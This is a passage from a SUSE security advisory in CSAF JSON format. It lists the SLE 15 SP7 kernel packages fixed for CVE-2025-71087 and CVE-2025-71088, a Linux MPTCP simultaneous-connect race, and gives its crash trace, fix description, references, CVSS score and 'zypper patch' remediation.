"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
